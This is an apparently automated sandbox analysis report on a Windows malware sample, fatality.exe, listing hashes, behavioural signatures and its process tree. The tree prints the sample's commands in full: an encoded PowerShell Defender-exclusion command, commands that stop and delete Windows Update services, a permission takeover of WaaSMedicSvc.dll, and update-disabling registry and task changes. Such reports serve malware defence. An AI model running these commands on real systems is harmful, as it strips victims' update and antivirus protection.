Analysis
-
max time kernel
21s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 16:52
Static task
static1
General
-
Target
fatality.exe
-
Size
4.4MB
-
MD5
96730495621816d6e5082a95574bd9d5
-
SHA1
b62168945da2966f4c4122f49df0e0ba5751ec0a
-
SHA256
e7ea0aaed1c2dea3cda5661fd66693909f63f1978bf07d25d90e6a5cfd310ef0
-
SHA512
a7ea21f0b8501ea0e00b6f01c6b2ea433f34129e1379e5ba877d81d1be15e9c128c3b4c7f911241ca82d14dbd8aacaf0f03d919a77826074c0ce2f57216d80b1
-
SSDEEP
98304:hU4R+GsvqbiXke/i06xLTDqGg9hGzkI5GYsgd1N9RZxxlgu:uOmvqbiU0iDZTDI9AzkI56gdz9RXL
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 452 takeown.exe 884 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 452 takeown.exe 884 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1420 sc.exe 1820 sc.exe 1688 sc.exe 1116 sc.exe 544 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 5 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exepid process 1132 reg.exe 1872 reg.exe 2040 reg.exe 840 reg.exe 1724 reg.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exedescription pid process Token: SeDebugPrivilege 1992 powershell.exe Token: SeShutdownPrivilege 1124 powercfg.exe Token: SeShutdownPrivilege 1028 powercfg.exe Token: SeShutdownPrivilege 1168 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeTakeOwnershipPrivilege 452 takeown.exe -
Suspicious use of WriteProcessMemory 57 IoCs
Processes:
fatality.execmd.execmd.exedescription pid process target process PID 2012 wrote to memory of 1992 2012 fatality.exe powershell.exe PID 2012 wrote to memory of 1992 2012 fatality.exe powershell.exe PID 2012 wrote to memory of 1992 2012 fatality.exe powershell.exe PID 2012 wrote to memory of 1476 2012 fatality.exe cmd.exe PID 2012 wrote to memory of 1476 2012 fatality.exe cmd.exe PID 2012 wrote to memory of 1476 2012 fatality.exe cmd.exe PID 2012 wrote to memory of 1440 2012 fatality.exe cmd.exe PID 2012 wrote to memory of 1440 2012 fatality.exe cmd.exe PID 2012 wrote to memory of 1440 2012 fatality.exe cmd.exe PID 1476 wrote to memory of 1116 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1116 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1116 1476 cmd.exe sc.exe PID 1440 wrote to memory of 1124 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1124 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1124 1440 cmd.exe powercfg.exe PID 1476 wrote to memory of 544 1476 cmd.exe sc.exe PID 1476 wrote to memory of 544 1476 cmd.exe sc.exe PID 1476 wrote to memory of 544 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1420 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1420 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1420 1476 cmd.exe sc.exe PID 1440 wrote to memory of 1028 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1028 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1028 1440 cmd.exe powercfg.exe PID 1476 wrote to memory of 1820 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1820 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1820 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1688 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1688 1476 cmd.exe sc.exe PID 1476 wrote to memory of 1688 1476 cmd.exe sc.exe PID 1440 wrote to memory of 1168 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1168 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1168 1440 cmd.exe powercfg.exe PID 1476 wrote to memory of 1872 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1872 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1872 1476 cmd.exe reg.exe PID 1440 wrote to memory of 1208 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1208 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 1208 1440 cmd.exe powercfg.exe PID 1476 wrote to memory of 2040 1476 cmd.exe reg.exe PID 1476 wrote to memory of 2040 1476 cmd.exe reg.exe PID 1476 wrote to memory of 2040 1476 cmd.exe reg.exe PID 1476 wrote to memory of 840 1476 cmd.exe reg.exe PID 1476 wrote to memory of 840 1476 cmd.exe reg.exe PID 1476 wrote to memory of 840 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1724 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1724 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1724 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1132 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1132 1476 cmd.exe reg.exe PID 1476 wrote to memory of 1132 1476 cmd.exe reg.exe PID 1476 wrote to memory of 452 1476 cmd.exe takeown.exe PID 1476 wrote to memory of 452 1476 cmd.exe takeown.exe PID 1476 wrote to memory of 452 1476 cmd.exe takeown.exe PID 1476 wrote to memory of 884 1476 cmd.exe icacls.exe PID 1476 wrote to memory of 884 1476 cmd.exe icacls.exe PID 1476 wrote to memory of 884 1476 cmd.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fatality.exe"C:\Users\Admin\AppData\Local\Temp\fatality.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBzAGYAdQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGUAIwA+AA=="2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1116 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:544 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1420 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1820 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1688 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:1872 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:2040 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:840 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:1724 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:1132 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:884 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/452-81-0x0000000000000000-mapping.dmp
-
memory/544-69-0x0000000000000000-mapping.dmp
-
memory/840-78-0x0000000000000000-mapping.dmp
-
memory/884-82-0x0000000000000000-mapping.dmp
-
memory/1028-71-0x0000000000000000-mapping.dmp
-
memory/1116-67-0x0000000000000000-mapping.dmp
-
memory/1124-68-0x0000000000000000-mapping.dmp
-
memory/1132-80-0x0000000000000000-mapping.dmp
-
memory/1168-74-0x0000000000000000-mapping.dmp
-
memory/1208-76-0x0000000000000000-mapping.dmp
-
memory/1420-70-0x0000000000000000-mapping.dmp
-
memory/1440-66-0x0000000000000000-mapping.dmp
-
memory/1476-65-0x0000000000000000-mapping.dmp
-
memory/1688-73-0x0000000000000000-mapping.dmp
-
memory/1724-79-0x0000000000000000-mapping.dmp
-
memory/1820-72-0x0000000000000000-mapping.dmp
-
memory/1872-75-0x0000000000000000-mapping.dmp
-
memory/1992-64-0x000000000258B000-0x00000000025AA000-memory.dmpFilesize
124KB
-
memory/1992-63-0x0000000002584000-0x0000000002587000-memory.dmpFilesize
12KB
-
memory/1992-62-0x000000000258B000-0x00000000025AA000-memory.dmpFilesize
124KB
-
memory/1992-61-0x000000001B730000-0x000000001BA2F000-memory.dmpFilesize
3.0MB
-
memory/1992-59-0x000007FEECEB0000-0x000007FEEDA0D000-memory.dmpFilesize
11.4MB
-
memory/1992-60-0x0000000002584000-0x0000000002587000-memory.dmpFilesize
12KB
-
memory/1992-58-0x000007FEEDA10000-0x000007FEEE433000-memory.dmpFilesize
10.1MB
-
memory/1992-56-0x0000000000000000-mapping.dmp
-
memory/2012-54-0x000000013FA70000-0x000000013FED0000-memory.dmpFilesize
4.4MB
-
memory/2012-55-0x000007FEFC371000-0x000007FEFC373000-memory.dmpFilesize
8KB
-
memory/2040-77-0x0000000000000000-mapping.dmp